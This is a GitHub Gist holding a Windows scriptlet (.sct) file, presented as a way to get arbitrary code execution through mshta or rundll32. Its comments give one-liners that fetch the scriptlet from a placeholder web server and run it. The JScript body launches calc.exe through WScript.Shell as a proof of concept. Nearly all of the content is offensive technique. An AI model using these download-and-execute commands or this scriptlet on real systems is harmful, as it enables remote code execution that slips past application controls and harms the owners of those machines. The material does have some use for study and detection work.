Skip to content

Instantly share code, notes, and snippets.

@minkione

minkione/scriptlet.sct

Forked from Arno0x/scriptlet.sct
Created November 27, 2017 11:28
Show Gist options
  • Save minkione/40aa14e6bae3b52763ebf104592873d1 to your computer and use it in GitHub Desktop.
Save minkione/40aa14e6bae3b52763ebf104592873d1 to your computer and use it in GitHub Desktop.
Download ZIP
Scriplet that can be executed by mshta or rundll32 for arbitrary code execution
Raw
scriptlet.sct
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment